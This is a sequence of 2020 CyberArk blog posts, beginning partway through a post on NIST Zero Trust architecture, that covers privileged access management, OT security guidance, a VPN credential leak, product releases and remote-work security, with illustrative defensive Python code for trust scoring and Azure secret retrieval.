Of course, shifting from perimeter-centric security to Zero Trust is an evolution that takes time, along with a measured, risk-based approach across people, process and technology domains. For those looking to get started with a Zero Trust program, the National Institute of Standards and Technology (NIST) offers insights for building Zero Trust Architectures (ZTAs). Within NIST SP 800-207, the organization outlines 11 logical components within an ideal ZTA, along with migration and threat mitigation strategies and use cases.

Each of these components is meant to limit access to strongly verified identities, protect the integrity of enterprise resources and provide complete audit trails.

Here’s a look at the full architecture:

Source: NIST SP 800-207. Core Zero Trust Logical Components

The Core of the NIST Zero Trust Architecture

Three components, the policy engine, policy administrator and policy enforcement point, comprise the core of an enterprise Zero Trust architecture. The policy engine makes the ultimate decision to grant access to the human, machine or application user based on enterprise policy, input from external sources (such as the continuous diagnostics and mitigation system or threat intelligence services) and a trust algorithm. More on that algorithm in a minute.

The policy administrator is responsible for establishing or shutting down the communication path between the user and the target resource. Once it receives the policy engine’s ultimate approval to grant access, it commands the policy enforcement point to initiate a session through the credential, key or token used by the user to access the enterprise resource.

Meanwhile, the policy enforcement point acts as the gatekeeper for the communication path. It is responsible for enabling, monitoring and terminating sessions (when necessary) between the human, machine or application and the target enterprise resource.

A Trust Algorithm to Rule Them All

Because these three core systems are inextricably connected, NIST recommends instituting a trust algorithm, which is built on observable (entity and enterprise system) information in the ZTA. It builds on data access policies and is refined via the organization’s threat intelligence feed(s).

NIST recommends that controls put in place to grant access to systems be responsive not only to policies, but also to an overall trust score that can influence policy evaluation. This score can be calculated through a single evaluation of the algorithm, or it can dynamically change over time based on things like entity behavior patterns.

Eight Data Sources Drive Zero Trust Access Decisions

NIST’s remaining eight logical ZTA components are data sources that provide critical input and policy rules to the core and enable the appropriate access decision. These include:

  • Public key infrastructure generates and logs certificates issued by the enterprise to resources, subjects, services and applications.
  • Identity management provides a good baseline for a higher degree of trust around entities, through the use of identity proofing.
  • Data access policies provide a domain of understanding and controls around what is acceptable behavior for the entities.
  • Continuous diagnostic mitigation (CDM) system monitors, reports on and corrects the integrity of systems in the enterprise architecture, and relies on support from the threat intelligence feed(s).
  • Threat intelligence feed(s) provides information from internal or external sources, such as information on newly discovered attacks or vulnerabilities, to help the policy engine make access decisions.
  • Industry compliance, security incident and event monitoring (SIEM) system, and network access and activity logs serve to collectively audit and track events and activities, providing analysis or reporting on the access records.
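To make the interplay of the trust algorithm and the three core components concrete, here is an added toy model (not NIST’s or CyberArk’s code): the policy engine scores the signals reported by the data sources listed above, the policy administrator relays its decision to the enforcement point, and a later threat-intelligence hit lowers the score so the live session is torn down. Weights, thresholds, roles and subjects are constructed for the example.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Data sources feeding the policy engine (all values constructed for the demo).
DATA_ACCESS_POLICY = {"billing-db": {"dba"}, "wiki": {"dba", "dev"}}  # resource -> roles
MIN_TRUST = {"billing-db": 0.8, "wiki": 0.5}                            # trust bar per resource

@dataclass
class Signals:
    """What PKI, identity management, CDM, threat intel and logs report."""
    cert_valid: bool          # PKI: enterprise-issued certificate checks out
    identity_proofed: bool    # identity management: strong proofing on file
    device_compliant: bool    # CDM: endpoint passes integrity checks
    threat_flagged: bool      # threat intel: subject or device in an indicator feed
    behavior_anomaly: float   # 0.0 normal .. 1.0 highly anomalous (from SIEM/logs)

@dataclass
class Subject:
    name: str
    role: str
    signals: Signals

class PolicyEngine:
    """Turns observable signals into a trust score and applies enterprise policy."""
    def trust_score(self, s: Signals) -> float:
        if s.threat_flagged:          # a threat-intel hit vetoes everything else
            return 0.0
        score = (0.3 if s.cert_valid else 0.0) + (0.3 if s.identity_proofed else 0.0)
        score += (0.2 if s.device_compliant else 0.0) + 0.2 * (1.0 - s.behavior_anomaly)
        return round(score, 2)

    def evaluate(self, subject: Subject, resource: str) -> Tuple[bool, float, List[str]]:
        # Returns (allow, score, reasons); access is allowed only when nothing blocks it.
        reasons = []
        if subject.role not in DATA_ACCESS_POLICY.get(resource, set()):
            reasons.append("data access policy forbids role")
        score, bar = self.trust_score(subject.signals), MIN_TRUST.get(resource, 1.0)
        if score < bar:
            reasons.append(f"trust {score} below bar {bar}")
        return (not reasons, score, reasons)

class PolicyEnforcementPoint:
    """Gatekeeper on the data path: opens, tracks and tears down sessions."""
    def __init__(self) -> None:
        self.sessions: Dict[str, str] = {}  # session id -> "subject->resource"
        self.audit: List[str] = []          # complete audit trail
        self._n = 0

    def open(self, subject: str, resource: str) -> str:
        self._n += 1
        sid = f"sess-{self._n}"
        self.sessions[sid] = f"{subject}->{resource}"
        self.audit.append(f"OPEN {sid} {self.sessions[sid]}")
        return sid

    def terminate(self, sid: str, why: str) -> None:
        path = self.sessions.pop(sid, None)
        if path:
            self.audit.append(f"TERMINATE {sid} {path}: {why}")

class PolicyAdministrator:
    """Relays PE decisions to the PEP and re-checks live sessions continuously."""
    def __init__(self, pe: PolicyEngine, pep: PolicyEnforcementPoint) -> None:
        self.pe, self.pep = pe, pep
        self.live: Dict[str, Tuple[Subject, str]] = {}

    def request_access(self, subject: Subject, resource: str) -> Optional[str]:
        allow, _, reasons = self.pe.evaluate(subject, resource)
        if not allow:
            self.pep.audit.append(f"DENY {subject.name}->{resource}: {'; '.join(reasons)}")
            return None
        sid = self.pep.open(subject.name, resource)
        self.live[sid] = (subject, resource)
        return sid

    def reevaluate(self) -> List[str]:
        # Dynamic trust: drop any session whose score no longer clears the bar.
        dropped = []
        for sid, (subject, resource) in list(self.live.items()):
            allow, _, reasons = self.pe.evaluate(subject, resource)
            if not allow:
                self.pep.terminate(sid, "; ".join(reasons))
                del self.live[sid]
                dropped.append(sid)
        return dropped

def demo() -> dict:
    # One allow, one policy deny, then a mid-session revocation after new intel.
    pe, pep = PolicyEngine(), PolicyEnforcementPoint()
    pa = PolicyAdministrator(pe, pep)
    alice = Subject("alice", "dba", Signals(True, True, True, False, 0.1))
    bob = Subject("bob", "dev", Signals(True, True, True, False, 0.0))
    sid = pa.request_access(alice, "billing-db")   # score 0.98 >= 0.8: session opens
    denied = pa.request_access(bob, "billing-db")  # role "dev" not allowed: None
    alice.signals.threat_flagged = True            # new threat-intel hit on alice
    dropped = pa.reevaluate()                      # PA tells PEP to cut the session
    return {"sid": sid, "denied": denied, "dropped": dropped, "audit": pep.audit}
```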

Stand Up Your Zero Trust Architecture with Privileged Access Management

While there are several ways enterprises can get started with Zero Trust, strong privileged access management controls are essential to establishing NIST’s three core architectural components.

Policy engine. Privileged access management solutions enforce authentication and authorization policies for privileged users leveraging enterprise policy and analytic algorithms that track behavioral patterns. Anomalous behavior, such as requesting access from a new location or outside of normal business hours, can trigger alerts so incident response teams can take immediate action.

Policy administrator point. By establishing isolation layers between endpoints, users and target systems while continuously monitoring access, privileged access management solutions secure the communication path between privileged users and target resources. This means you’ll know who gained access, what that user accessed, and exactly when (and for how long) the access was granted.

Policy enforcement point. Privileged access management helps you remediate risky behavior by automatically suspending or terminating privileged sessions based on risk assignment. It can also initiate automatic credential rotation in the event of privileged credential compromise or theft, and keep a full audit record to simplify compliance and aid remediation, when necessary.

Privileged access management solutions are designed to protect your most critical systems and assets — the core of your enterprise. With the right tools, you can grant access to strongly verified identities and leverage integrations with leading security solutions to optimize access policies.

By encompassing the key elements of Zero Trust — verification and monitoring — privileged access management empowers organizations to prevent credential theft, stop lateral movement, limit privilege escalation and abuse, and ultimately, protect what matters most.

Learn more in this on-demand webinar and tap into the CyberArk Blueprint for Privileged Access Management Success for prescriptive guidance on designing core ZTA workflows.

Editor’s Note: Thanks to Carlos Condado who contributed to this blog post.

NSA and CISA Urge Action to Reduce Operational Technology Risk
https://www.cyberark.com/blog/nsa-and-cisa-urge-action-to-reduce-operational-technology-risk/ Wed, 09 Sep 2020 14:14:26 +0000

The critical infrastructure that underpins our modern way of life continues to be under attack. The 2015 hack of Ukraine’s power grid brought this sobering reality into focus, and since then, threats have continued to grow in number and sophistication. In recent months, attackers doubled down on energy companies, water facilities, and more, often exploiting internet-connected operational technologies (OT) to reach into industrial control systems.

As a result, the U.S. National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CISA) recently issued an alert recommending actions to reduce exposure across operational technologies and industrial control systems (ICS). It includes guidance on securing privileged credentials, which threat actors consistently target as part of critical infrastructure attacks.

By compromising privileged credentials (or stealing user identities with access that can become privileged) and gaining admin-level access to connected OT assets, attackers can disrupt critical services, corrupt OT and IT systems, wipe out endpoints and servers, and ultimately, put human lives in danger.

OT-IT Convergence and a Growing Attack Surface

So how is OT different from IT? OT comprises the hardware and software systems that monitor and control physical equipment and processes. These are highly specialized environments, complete with proprietary technology that is unfamiliar to most people beyond the operators and engineers working with them. OT systems are often “air-gapped” or segmented from outside networks for security and availability purposes. But as companies increase remote operations and outsource numerous tasks including equipment servicing and maintenance, connectivity becomes critical, and OT and IT technologies continue to converge.

This convergence can present numerous challenges, the first being that OT systems (many of which are decades old) were simply not designed to withstand today’s highly targeted attacks. As these systems become increasingly connected, the attack surface has expanded dramatically. The potential for nation-states or malicious insiders to steal or abuse privileged credentials to gain access to critical industrial control systems is a critical concern. Moreover, publicly available open source tools like Shodan and Kamerka can be used by attackers to conduct reconnaissance, pinpoint connected OT assets and map out their mission.

Privileged Access Risk: Spotlight on the Energy Sector

Privileged accounts, and the access they provide, represent one of the most significant security vulnerabilities critical infrastructure companies face today. While this is true for all 16 critical infrastructure sectors (as defined by the U.S. Department of Homeland Security), let’s explore some specific examples of privileged access risk in the energy sector. More specifically, in substations, the physical stations that transform voltage and either transmit or distribute power to designated areas of a region:

Remote Access to Substations

Substations are widely distributed around a region and are typically unattended. They rely on supervisory control and data acquisition (SCADA) for remote access, supervision and control. This requires connectivity. In the case of the Ukraine attack, threat actors opened breakers at 30 distribution substations. They did this by capturing privileged accounts from infected workstations, moving laterally through the IT environment, escalating privileges and setting up back doors to ensure persistence. Then, they used this elevated access to VPN from the IT environment into the OT environment, which was not properly air gapped.

Having a privileged access management (PAM) program in place to help protect against this type of risk is paramount. PAM is also an important security control to help ensure remote workers have only the necessary levels of access to OT machines and sensitive information to do their jobs — and nothing more — while enabling continuous visibility of all privileged activity and rapid response to anomalous behavior. (You can learn more about this in our recent blog post “Security for the Modern IT Environment.”)

Insecure Substation OT Devices

The OT equipment found in substations — including switchyards, switches, circuit breakers and transformers — is all created with a default security password, known as a standard PIN. This equipment is used for years, and often, the factory-issued standard PIN is never changed. Making matters worse, these PINs are easy to find through a quick Google search. Attackers know all of this. If they can gain access to a connected substation, they can easily abuse these hardcoded passwords to disable or corrupt critical OT devices and systems.

Five Steps for Protecting Privileged Access in OT Environments

While there is no silver bullet for OT cybersecurity, fundamental privileged access management controls can help protect against threats and dramatically reduce the impact of an attack.

The NSA and CISA offer guidance on securing identities and privileged credentials in OT environments. As part of a detailed mitigation strategy, they recommend critical infrastructure facilities “secure all required and approved remote access and user accounts” by following five steps:

1. Prohibit the use of default passwords on all devices, including controllers and OT equipment.

Our take: This should be the first thing you do after onboarding a new OT device in the environment. Same goes for the connected IoT devices in your home such as routers or printers — especially if you are working remotely.

2. Remove, disable or rename any default system accounts wherever possible, especially those with elevated privileges or remote access.

Our take: After you do this, identify the users that require privileged and/or remote access — or users that could become privileged under certain conditions — and implement strong controls that keep these users productive, but also secure.

3. Enforce a strong password security policy (e.g., length, complexity).

Our take: A significant part of effective enforcement is a strong and consistent approach to educating employees about cybersecurity risks and the fundamental importance of protecting passwords.

4. Require users to change passwords periodically, when possible.

Our take: Even better, take the onus off the user by storing all privileged account passwords and credentials in an encrypted repository. Then automatically rotate these credentials based on policy to streamline admin and user workflows.

5. Enforce or plan to implement two-factor authentication for all remote connections.

Our take: As we recently highlighted in our Twitter attack deconstruction, an account is more than 99.9% less likely to be compromised if MFA is in place. Mandating MFA should be table stakes.

The NSA and CISA also urge critical infrastructure facilities to “implement a continuous and vigilant system monitoring program” that enables anomaly detection. This can help organizations identify malicious cyber tactics like “living off the land,” where attackers abuse privileged access to gain network persistence, pose as authorized users and then utilize native tools or features existing in the OT environment to accomplish their mission.

As OT and IT systems become increasingly intertwined, critical infrastructure companies must make privileged access management a priority to combat highly organized, well-funded attackers. For more information on CyberArk’s approach to securing privileged access across OT environments, visit here.

CyberArk Extends Cloud Deployment Options, Improves Simplicity and Scalability with v11.6
https://www.cyberark.com/blog/cyberark-extends-cloud-deployment-options-improves-simplicity-and-scalability-with-v11-6/ Thu, 27 Aug 2020 14:30:45 +0000

“Change is the only constant in life” is a well-known adage first attributed to the Ancient Greek philosopher Heraclitus of Ephesus. While the world has evolved dramatically since Heraclitus’ day, this quote continues to ring true.

Fast forward to the summer of 2020 and everything feels in continuous flux. From a business and IT perspective, organizations have moved quickly to support their remote workforce and are continuing to explore new cloud-based solutions to help their organizations stay productive. Meanwhile, attackers are preying on global uncertainty and are specifically targeting these new enabling technologies, hoping to take advantage of misconfigurations and unknown vulnerabilities.

As security teams continue to adjust to the new normal, keeping their CyberArk privileged access management (PAM) deployments up to date with the latest enhancements is an important step to stay one step ahead of the attackers. So let’s take a look at some of the new features we’ve released in the CyberArk Privileged Access Security Solution version 11.6 (v11.6) to help security teams achieve security at scale in a changing landscape.

Vault Deployment – Have PAM Your Way with a Hybrid, Single or Multi-Cloud Deployment

As the volume of cyber attacks continues to increase, most attackers continue to rely on the exploitation of privileged credentials. As the attack surface grows with remote work environments and expanded cloud deployments, organizations are turning to PAM solutions that help prevent credential theft, stop vertical and lateral movement, and limit privilege escalation and abuse. Maintaining the availability of key PAM processes is an important element of a defense-in-depth strategy.

With v11.6, CyberArk now supports Vault deployments in hybrid cloud architectures, in which Vaults are deployed between on-premises data centers and AWS or Azure cloud-based data centers for increased availability.

For example, organizations can now deploy their primary Vault on-premises while locating their Disaster Recovery Vault in their cloud environment, or vice-versa.

CyberArk customers can now optimize their Vault deployment for their specific environment: entirely on-premises, in a hybrid cloud environment, across different regions or availability zones in a single cloud provider network, or in a multi-cloud AWS and Azure architecture.

As many of our customers adopt software as a service (SaaS)-based approaches to their technology stack, CyberArk Privilege Cloud, our PAM as a Service solution, is an increasingly popular option. With CyberArk Privilege Cloud, failover between availability zones for the vault is offered as part of the service.

New Bulk Upload Features and REST APIs Simplify Onboarding and Discovery

Version 11.6 also introduces two new features to improve reporting and onboarding capabilities.

First, a new bulk upload feature makes it faster and easier to onboard privileged accounts, such as Windows and Linux admin accounts and SSH keys, supporting organizations as they scale their PAM solutions to secure more of their workloads. The bulk upload method reduces the time required to onboard accounts by 50% compared to existing REST API scripts, and by 75% compared to the Password Upload Utility.

Additionally, new REST API scripts provide users increased insight and detail on the status of privileged account discovery and onboarding. CyberArk administrators can measure the success and progress of discovery and onboarding efforts, enabling them to demonstrate the ROI of PAM efforts back to the business. The bulk upload method and new REST API scripts will be available for CyberArk Privilege Cloud in 2020 Q4.

Together, these new tools improve time to value and reporting capabilities for PAM deployments, allowing businesses to tackle complex PAM projects without sacrificing user experience.

Privileged Threat Analytics Scale Improvements and Deployment via Azure Resource Manager

In v11.6, we’ve also improved the scalability of key threat detection capabilities within the CyberArk Core Privileged Access Security solution. Each server running CyberArk’s threat analytics capabilities now analyzes up to 3,000 syslog events per second to detect risky and malicious privileged behavior — representing a 75% improvement in scalability.

In addition to the increased scalability, v11.6 also includes a Microsoft Azure Resource Manager (ARM) template, enabling customers to automatically deploy CyberArk privileged threat analytics capabilities in their Azure environments. Organizations can now deploy the related threat analytics infrastructure on-premises, in AWS or in Azure.

Learn More About CyberArk Privileged Access Security Solution v11.6

In today’s “new normal,” IT infrastructures are everything but. Organizations everywhere need security solutions that scale and allow them to confidently navigate change during their digital transformation journeys. At CyberArk, we’re committed to providing these solutions.

To learn more about CyberArk v11.6, contact us for a demo.

Time to Re-examine Remote Access After VPN Password Leak
https://www.cyberark.com/blog/time-to-re-examine-remote-access-after-vpn-password-leak/ Wed, 12 Aug 2020 15:35:05 +0000

Just days ago, a list of plaintext usernames, passwords and IP addresses for more than 900 Pulse Secure VPN servers was published online along with SSH keys for each server, a list of all local users and their password hashes, admin account details, last VPN logins and VPN session cookies.

So how did attackers get their hands on the information?

The leaked list also highlighted each VPN server’s firmware version and as it turns out, all listed servers were running an older version that is susceptible to CVE-2019-11510 – an arbitrary file reading vulnerability.

Researchers believe that the attackers responsible for this leak scanned for all IPv4 internet addresses and then exploited the vulnerability to gain access to each company’s sensitive systems and server details. Based on timestamps, the information was collected between June 24 and July 8, 2020.

At the time of the scan, 617 out of the 913 unique IP addresses published were still vulnerable to CVE-2019-11510, despite the vulnerability having been made public in August 2019 and customers urged to immediately apply the patch and change their passwords.

It’s Time to Re-examine Remote Access

VPN server usage has skyrocketed with the rise in remote work — one study points to a 124% increase in March 2020 alone. More than ever, employees and third parties alike rely on VPNs to access corporate networks from remote locations and, in some cases, gain privileged access to critical business systems and applications to do their jobs. However, VPNs provide network access and aren’t designed to provide privileged access to critical internal systems.

The increased reliance on VPNs has grabbed the attention of attackers as they look to take advantage of the dynamic environment the global pandemic has caused – and many have been successful.

By exploiting vulnerabilities in VPN servers and gaining access to sensitive systems, these threat actors can deploy ransomware, encrypt entire networks and demand huge payments. Today in the United States, the average ransomware demand is $84,000 and incidents typically result in 16 days of downtime — at a conservative estimate of $10,000 per day.

While VPNs have traditionally served an important role, this high-profile leak and other recent breaches underscore the need for organizations to reexamine how they provide remote access to the most sensitive aspects of their corporate network.

When exploring ways to connect remote employees and vendors, it’s important to strike the right balance between security and usability. Doron Naim, cyber research group manager at CyberArk Labs, notes that advances in Zero Trust access, which provides granular access to a specific critical system instead of the whole network; biometric multi-factor authentication (MFA); and just-in-time provisioning are making it possible for organizations to achieve this balance without costly tradeoffs. Such approaches, combined with privileged session isolation and management, could eliminate the need for a VPN altogether in some cases, and with it, the associated operational burden on IT admin teams.

The traditional perimeter is gone. As many employees continue to work remotely and organizations rely heavily on outsourced operations, the time is now to find innovative ways to grant secure privileged access to remote users without disrupting operations. To learn how CyberArk is tackling this challenge with privileged access management (PAM), visit here.

The Gartner 2020 Magic Quadrant for PAM is Here!
https://www.cyberark.com/blog/the-gartner-2020-magic-quadrant-for-pam-is-here/ Mon, 10 Aug 2020 15:32:38 +0000

Today, we announced that CyberArk has been named a Leader in the Gartner 2020 Magic Quadrant for Privileged Access Management.[1] CyberArk was positioned both highest in ability to execute and furthest in completeness of vision, for the second time in a row.

First and foremost, we want to thank our customers, partners and employees for being the foundation of our success. You are what motivates us, every day.

It’s our mission to continue to improve security for our more than 6,000 customers as they digitally transform their business. This is what drives CyberArk to constantly innovate and drive toward finding new ways to reduce risk for these global organizations – all while delivering a superior user experience focused on improving productivity and creating new efficiencies that move their businesses forward.

We know the world is operating in dramatically new ways, but what hasn’t changed is the attack pathway, which consistently targets businesses’ most valuable assets.

Organizations can’t stop attacks if they don’t secure privileged access everywhere: in the cloud, on endpoint devices, in applications, within automated processes, and throughout the DevOps pipeline. What’s more, the security of privileged access needs to encompass a company’s remote employees, as well as all its supply chain partners – as well as their home-based workers.

We are proud of our accomplishments over the past year, which include new just-in-time access capabilities that complement broader least privilege strategies; Alero, our SaaS-based remote user solution that combines Zero Trust access and biometric multi-factor authentication; as well as delivering the industry’s broadest portfolio of SaaS-based solutions for privileged access management. I am especially excited about executing on our vision for Identity Security, which starts with Zero Trust and uses artificial intelligence to understand context and intent. This approach will help organizations dramatically reduce risk, while providing a seamless user experience that securely enables the business and supports any device, application or user — regardless of role or location.

In addition to the Magic Quadrant, Gartner also published a companion report, “2020 Critical Capabilities for Privileged Access Management,”[2] that states, “Gartner has identified PAM as a top 10 security control, and the market continues to grow at a double-digit rate.”

We at CyberArk believe it’s important to continue to emphasize the importance of PAM as critical to organizations’ cybersecurity strategies and strategic risk management initiatives. This is true, now, more than ever before.

To learn more, download the full Gartner 2020 Magic Quadrant for Privileged Access Management report here: https://www.cyberark.com/gartner-mq-pam/

[1] Gartner, Magic Quadrant for Privileged Access Management, Felix Gaehtgens, Abhyuday Data, Michael Kelley, 4 August 2020
[2] Gartner, Critical Capabilities for Privileged Access Management, Michael Kelley, Felix Gaehtgens, Abhyuday Data, 4 August 2020

Gartner Disclaimers

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Making Azure Cloud Environments Even More Secure with CyberArk
https://www.cyberark.com/blog/making-azure-cloud-environments-even-more-secure-with-cyberark-3/ Tue, 04 Aug 2020 19:47:39 +0000

A recent survey of technology executives at large firms showed that Microsoft Azure continues to be the most popular provider of public cloud services, even as Amazon leads the market overall in terms of revenue – a trend that appears to be holding. In the same survey, 66 percent of respondents predicted that they would be using Microsoft Azure three years down the line.

Last week, at Impact Live 2020, CyberArk shared new capabilities that developers, security teams and cloud architects can use to enhance the security of Azure cloud environments including:

Native Authentication for Microsoft Azure Workloads Requesting Secrets

Application workloads, containers and other apps running on Azure can natively authenticate to CyberArk’s secrets management solution. With CyberArk Application Access Manager or Conjur Open Source, applications running in Microsoft Azure that require credentials to, for example, access a database or other sensitive resource, can now natively authenticate to the secrets management platform.

The native authentication between the application and the secrets management solution, whether the enterprise or the open source version of CyberArk’s secrets management solution, uses the underlying Managed Identity for Azure Resources from Azure Active Directory. This authentication method is easier and more secure than storing an API key for identification and, most importantly, eliminates the “secret zero” problem – the all too common challenge of needing a secret to get a secret.
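An added illustration (not CyberArk’s or Conjur’s code) of the flow just described: the workload asks Azure’s Instance Metadata Service for its managed-identity token, presents it to the secrets manager’s Azure authenticator, and only then retrieves the database credential, so no API key is ever embedded in the application. The IMDS endpoint, `Metadata: true` header and `api-version` are Azure’s documented ones; the `authn-azure` URL shape, the `jwt` form field and the `secrets` endpoint are assumptions based on the Conjur REST documentation, and the Conjur URL, account, service ID, host ID and variable name are placeholders. The HTTP layer is injected so the example runs offline against a constructed stand-in.

```python
import base64
import json
from typing import Callable, Dict, Tuple
from urllib.parse import quote, urlencode

# Azure IMDS: documented link-local endpoint; requests must carry "Metadata: true".
IMDS_TOKEN_URL = "http://169.254.169.254/metadata/identity/oauth2/token"
# Conjur side: placeholder values, not a real deployment.
CONJUR_URL = "https://conjur.example.internal"
CONJUR_ACCOUNT = "myorg"
AUTHN_SERVICE_ID = "prod"   # the authn-azure service ID configured in Conjur policy

# (method, url, headers, body) -> (status, response text); injected so the example
# runs offline and the exact requests can be inspected.
Request = Tuple[str, str, Dict[str, str], str]
Http = Callable[[str, str, Dict[str, str], str], Tuple[int, str]]


def imds_token_request(resource: str) -> Request:
    """Ask the Instance Metadata Service for this VM's managed-identity token."""
    url = IMDS_TOKEN_URL + "?" + urlencode({"api-version": "2018-02-01", "resource": resource})
    return ("GET", url, {"Metadata": "true"}, "")


def conjur_authn_request(host_id: str, azure_jwt: str) -> Request:
    """Present the Azure token to the authn-azure endpoint (URL shape assumed from the
    Conjur docs); the Conjur host ID is URL-encoded into a single path segment."""
    url = (f"{CONJUR_URL}/authn-azure/{AUTHN_SERVICE_ID}/{CONJUR_ACCOUNT}/"
           f"{quote(host_id, safe='')}/authenticate")
    headers = {"Content-Type": "application/x-www-form-urlencoded",
               "Accept-Encoding": "base64"}     # ask for a base64-encoded Conjur token
    return ("POST", url, headers, urlencode({"jwt": azure_jwt}))


def conjur_secret_request(conjur_token_b64: str, variable_id: str) -> Request:
    """Fetch a variable using the short-lived Conjur token in the Authorization header."""
    url = f"{CONJUR_URL}/secrets/{CONJUR_ACCOUNT}/variable/{quote(variable_id, safe='')}"
    return ("GET", url, {"Authorization": f'Token token="{conjur_token_b64}"'}, "")


def fetch_secret(http: Http, host_id: str, variable_id: str,
                 resource: str = "https://management.azure.com/") -> str:
    """Full flow: platform identity -> Conjur token -> secret. There is no secret zero:
    the only credential the workload starts with is the identity Azure gave the VM."""
    status, body = http(*imds_token_request(resource))
    if status != 200:
        raise RuntimeError(f"IMDS refused token request: {status}")
    azure_jwt = json.loads(body)["access_token"]

    status, body = http(*conjur_authn_request(host_id, azure_jwt))
    if status != 200:
        raise RuntimeError(f"Conjur authn-azure rejected the identity: {status}")
    conjur_token_b64 = body.strip()

    status, body = http(*conjur_secret_request(conjur_token_b64, variable_id))
    if status != 200:
        raise RuntimeError(f"Conjur refused secret {variable_id}: {status}")
    return body


def fake_http(azure_jwt: str = "constructed.azure.jwt",
              secret_value: str = "constructed-db-password") -> Http:
    """Constructed offline stand-in for IMDS and Conjur; honours only well-formed requests."""
    conjur_token = base64.b64encode(b'{"constructed":"conjur-token"}').decode()

    def http(method: str, url: str, headers: Dict[str, str], body: str) -> Tuple[int, str]:
        if url.startswith(IMDS_TOKEN_URL) and method == "GET":
            if headers.get("Metadata") != "true":   # IMDS rejects requests without it
                return 400, "missing Metadata header"
            return 200, json.dumps({"access_token": azure_jwt})
        if url.startswith(f"{CONJUR_URL}/authn-azure/") and method == "POST":
            return (200, conjur_token) if body == urlencode({"jwt": azure_jwt}) else (401, "")
        if url.startswith(f"{CONJUR_URL}/secrets/") and method == "GET":
            ok = headers.get("Authorization") == f'Token token="{conjur_token}"'
            return (200, secret_value) if ok else (401, "")
        return 404, ""
    return http
```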

Increased Flexibility Deploying CyberArk in Microsoft Azure and Multi-Cloud Environments

The recent release of CyberArk Privileged Access Security Solution v11.5 added capabilities to automate the deployment of CyberArk Vault environments in Azure and to support multi-cloud and multi-region configuration options with Azure.

CyberArk customers can now automate the deployment of their primary and recovery vaults between AWS and Azure for improved performance and availability. For example, customers can choose to deploy their Primary Vault in Azure and their Disaster Recovery Vault in AWS.

CyberArk also supports automated deployment of vault environments across different regions and availability zones within the same cloud provider. Customers can deploy their Primary Vault and their Disaster Recovery Vault in different regions within the Azure global infrastructure. For example, customers could deploy their Primary Vault in one of Azure’s eastern US regions while deploying their Disaster Recovery Vault in Azure’s Western Europe region.

Credential Theft Detection for Microsoft Azure

In one of the keynotes at Impact 2020, CyberArk Vice Presidents of Product Management Karen Eldor and Yair Sade announced that CyberArk customers can now automatically detect the theft of Identity and Access Management (IAM) credentials that grant access to Azure environments.

One major theme of Impact was the idea that, in modern IT environments, all identities can become privileged under certain conditions. This is especially true in the cloud. All Azure IAM users – whether they are traditional privileged users, like IT admins, or standard workforce users (“non-privileged users”) – can potentially interact with sensitive resources after logging in to Azure environments with an IAM account. This makes Azure IAM credentials top targets for attackers.

CyberArk now addresses this challenge by detecting, alerting and automatically responding to potential compromise of IAM credentials. When suspected credential theft occurs, CyberArk automatically alerts the Security and Operations teams and rotates the credentials to remediate the situation.

As announced at Impact, upcoming versions of the CyberArk Privileged Access Security Solution will feature an Azure Resource Manager (ARM) template to automatically deploy these capabilities with the goal of accelerating deployment and simplifying administration. Extending threat analytics to detect and remediate other forms of privileged behavior in Azure is another key part of CyberArk’s roadmap.

CyberArk and Azure, Better Together

These new capabilities reflect our continued commitment to provide customers with more flexibility for how they deploy and run the CyberArk Privileged Access Security Solution in Azure, multi-cloud and hybrid environments, as well as to improve the security of Azure workloads and the resources they access.

We continue to develop Azure capabilities and advance our partnership. For example, we help companies migrating their Windows server workloads to Azure get single pane visibility across their on-premises and cloud workloads. We support shared responsibility for security in the cloud from day one with a solution focused on protecting cloud access as well as human and non-human privileged users.

To learn more, visit the CyberArk Marketplace to get started with any of CyberArk’s integrations with Azure. If you missed Impact Live 2020, don’t worry – sign up for Impact Live on demand and check out “Securing Privileged Access in a Hybrid World.”

Are Current Work From Home Security Measures Enough?
https://www.cyberark.com/blog/are-current-work-from-home-security-measures-enough/ Fri, 31 Jul 2020 18:03:31 +0000

The COVID-19 pandemic has turned working from home from a perk to an everyday reality. These changes are permanent, and they require a new security perspective.

The chaos of the first few months of the COVID-19 pandemic required swift decision making and abrupt, earth-shaking changes to everything from the workplace to the grocery store. Although thoroughly disruptive, many of these changes – particularly in the case of a now largely remote workforce – were initially seen as temporary fixes. They would last a few weeks, perhaps, before things returned “to normal.”

We are now well aware that “normal” is not coming back.

Those reactive quick fixes are now the first steps towards permanent change. Earlier this year, the number of job postings on ZipRecruiter that offered work from home was 1.3%. Since March, that number has risen to 11.3% and will only keep rising. Major tech companies like Facebook and Twitter have even gone so far as to institute permanent work from home positions.

Because the pandemic moved so swiftly and upended companies on so many levels, many had little choice but to opt for speed over security. Getting an entire workforce set up to function remotely – if that were even an option for the company – meant that corners had to be cut.

According to the CyberArk Remote Work study, 77% of remote workers admit they are using personal devices to access corporate systems. An additional 66% are utilizing potentially vulnerable communications platforms like Zoom and Microsoft Teams for corporate work and collaboration. A small but not insignificant number (37%) still save important passwords in browsers on their “work” computers.

“As more organizations extend work-from-home policies for the long term,” says CyberArk CMO Marianne Budnik, “it’s important to capture lessons learned from the initial phases of remote work and shape future cybersecurity strategies that don’t require employees to make tradeoffs that could put their company at risk.”

The dust is settling and the long term view is coming into focus. The question now is, are companies actually doing enough to balance the convenience needed for remote work with the stringent protections required for corporate data?

Are IT Departments Doing Enough?

Perhaps the most confounding finding from the CyberArk Remote Work study wasn’t that remote workers aren’t employing the strictest security measures; it’s the glaring discrepancy between the mindset shared by an overwhelming number of IT professionals and the actual, tangible actions they have taken regarding WFH security.

During the first few months of the pandemic, some systems were exposed because developers made the conscious decision to opt for a friction-free experience over one that offered more security. The phenomenon known as “Zoombombing” was the most visible example – companies began wholesale adopting Zoom as their go-to meeting resource, only to find that nearly anyone could drop into a meeting with little or no barrier to access.

“Organizations of all kinds are facing an uptick in email-based threats, endpoint-security gaps and other problems as a result of the sudden switch to a fully remote workforce,” says William Altman, Senior Analyst at the Global Cyber Center of NYC, operated by SOSA. “It’s now more important than ever to consider both the security practitioner as well as ethical-hacker perspectives in order to stay secure, that’s what this is all about.”

